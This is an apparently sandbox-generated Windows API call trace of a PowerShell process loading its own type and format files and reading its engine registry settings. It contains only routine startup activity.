	[0618.026] CoTaskMemFree (pv=0x1aa050) 
	[0618.027] GetACP () returned 0x4e4
	[0618.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0618.047] SetErrorMode (uMode=0x1) returned 0x1
	[0618.048] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0618.049] GetFileType (hFile=0x328) returned 0x1
	[0618.049] SetErrorMode (uMode=0x1) returned 0x1
	[0618.049] GetFileType (hFile=0x328) returned 0x1
	[0618.771] ReadFile (in: hFile=0x328, lpBuffer=0x2da88a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2da88a0*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0618.773] ReadFile (in: hFile=0x328, lpBuffer=0x2da88a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2da88a0*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0618.773] ReadFile (in: hFile=0x328, lpBuffer=0x2da88a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2da88a0*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0618.774] ReadFile (in: hFile=0x328, lpBuffer=0x2da88a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2da88a0*, lpNumberOfBytesRead=0x16d188*=0xcf3, lpOverlapped=0x0) returned 1
	[0618.775] ReadFile (in: hFile=0x328, lpBuffer=0x2da7cfb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2da7cfb*, lpNumberOfBytesRead=0x16d188*=0x0, lpOverlapped=0x0) returned 1
	[0618.775] ReadFile (in: hFile=0x328, lpBuffer=0x2da88a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2da88a0*, lpNumberOfBytesRead=0x16d188*=0x0, lpOverlapped=0x0) returned 1
	[0618.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0618.777] SetErrorMode (uMode=0x1) returned 0x1
	[0618.777] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d100 | out: lpFileInformation=0x16d100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0618.777] SetErrorMode (uMode=0x1) returned 0x1
	[0618.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0618.779] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1e8 | out: phkResult=0x16d1e8*=0x328) returned 0x0
	[0618.779] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d16c, lpData=0x0, lpcbData=0x16d168*=0x0 | out: lpType=0x16d16c*=0x1, lpData=0x0, lpcbData=0x16d168*=0x56) returned 0x0
	[0618.779] CoTaskMemAlloc (cb=0x5a) returned 0x26f6a0
	[0618.779] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d13c, lpData=0x26f6a0, lpcbData=0x16d138*=0x56 | out: lpType=0x16d13c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d138*=0x56) returned 0x0
	[0618.779] CoTaskMemFree (pv=0x26f6a0) 
	[0618.779] RegCloseKey (hKey=0x328) returned 0x0
	[0618.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0618.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0619.627] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0620.387] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0620.387] GetFileType (hFile=0x2e4) returned 0x1
	[0620.387] SetErrorMode (uMode=0x1) returned 0x1
	[0620.387] GetFileType (hFile=0x2e4) returned 0x1
	[0620.387] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.391] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.391] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.391] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.392] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.392] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.392] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.392] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.392] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.395] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.395] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.395] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.396] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.396] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.396] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.397] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.397] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.401] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.401] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.402] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.402] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.403] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.403] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.403] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.404] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.404] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.405] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.405] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.405] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.406] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.406] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.406] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.407] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.413] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.414] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.414] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.415] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.415] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.415] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.416] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.416] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1000, lpOverlapped=0x0) returned 1
	[0620.417] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x1b4, lpOverlapped=0x0) returned 1
	[0620.417] ReadFile (in: hFile=0x2e4, lpBuffer=0x2c72250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d188, lpOverlapped=0x0 | out: lpBuffer=0x2c72250*, lpNumberOfBytesRead=0x16d188*=0x0, lpOverlapped=0x0) returned 1
	[0620.417] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1e8 | out: phkResult=0x16d1e8*=0x2e4) returned 0x0
	[0620.417] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d16c, lpData=0x0, lpcbData=0x16d168*=0x0 | out: lpType=0x16d16c*=0x1, lpData=0x0, lpcbData=0x16d168*=0x56) returned 0x0
	[0620.417] CoTaskMemAlloc (cb=0x5a) returned 0x241000
	[0620.417] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d13c, lpData=0x241000, lpcbData=0x16d138*=0x56 | out: lpType=0x16d13c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d138*=0x56) returned 0x0
	[0620.418] CoTaskMemFree (pv=0x241000) 
	[0620.418] RegCloseKey (hKey=0x2e4) returned 0x0
	[0620.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0620.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0624.651] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0624.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.651] CoTaskMemFree (pv=0x1aa050) 
	[0625.360] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d388 | out: phkResult=0x16d388*=0x2e4) returned 0x0
	[0625.361] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0x16d39c, lpData=0x0, lpcbData=0x16d398*=0x0 | out: lpType=0x16d39c*=0x1, lpData=0x0, lpcbData=0x16d398*=0x74) returned 0x0
	[0625.361] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0x16d30c, lpData=0x0, lpcbData=0x16d308*=0x0 | out: lpType=0x16d30c*=0x1, lpData=0x0, lpcbData=0x16d308*=0x74) returned 0x0
	[0625.361] CoTaskMemAlloc (cb=0x78) returned 0x1f0300
	[0625.361] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0x16d2dc, lpData=0x1f0300, lpcbData=0x16d2d8*=0x74 | out: lpType=0x16d2dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d2d8*=0x74) returned 0x0
	[0625.361] CoTaskMemFree (pv=0x1f0300) 
	[0625.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0625.361] SetErrorMode (uMode=0x1) returned 0x1
	[0625.361] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d260 | out: lpFileInformation=0x16d260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0625.361] SetErrorMode (uMode=0x1) returned 0x1
	[0625.364] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0625.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.364] CoTaskMemFree (pv=0x1aa050) 
	[0625.369] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0625.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.369] CoTaskMemFree (pv=0x1aa050) 
	[0625.369] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0625.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.369] CoTaskMemFree (pv=0x1aa050) 
	[0625.370] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0625.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.370] CoTaskMemFree (pv=0x1aa050) 
	[0625.370] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0625.371] GetFileType (hFile=0x2e8) returned 0x1
	[0625.371] SetErrorMode (uMode=0x1) returned 0x1
	[0625.371] GetFileType (hFile=0x2e8) returned 0x1
	[0625.371] ReadFile (in: hFile=0x2e8, lpBuffer=0x32b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32b4588*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.374] ReadFile (in: hFile=0x2e8, lpBuffer=0x32b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32b4588*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.375] ReadFile (in: hFile=0x2e8, lpBuffer=0x32b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32b4588*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.375] ReadFile (in: hFile=0x2e8, lpBuffer=0x32b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32b4588*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.376] ReadFile (in: hFile=0x2e8, lpBuffer=0x32b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32b4588*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.377] ReadFile (in: hFile=0x2e8, lpBuffer=0x32b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32b4588*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0625.377] ReadFile (in: hFile=0x2e8, lpBuffer=0x32b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32b4588*, lpNumberOfBytesRead=0x16cef8*=0x9e2, lpOverlapped=0x0) returned 1
	[0625.377] ReadFile (in: hFile=0x2e8, lpBuffer=0x32b3ad2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32b3ad2*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0625.377] ReadFile (in: hFile=0x2e8, lpBuffer=0x32b4588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32b4588*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0625.378] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf88 | out: phkResult=0x16cf88*=0x2e8) returned 0x0
	[0625.378] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cf0c, lpData=0x0, lpcbData=0x16cf08*=0x0 | out: lpType=0x16cf0c*=0x1, lpData=0x0, lpcbData=0x16cf08*=0x56) returned 0x0
	[0625.378] CoTaskMemAlloc (cb=0x5a) returned 0x26f6a0
	[0625.378] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cedc, lpData=0x26f6a0, lpcbData=0x16ced8*=0x56 | out: lpType=0x16cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ced8*=0x56) returned 0x0
	[0625.378] CoTaskMemFree (pv=0x26f6a0) 
	[0625.378] RegCloseKey (hKey=0x2e8) returned 0x0
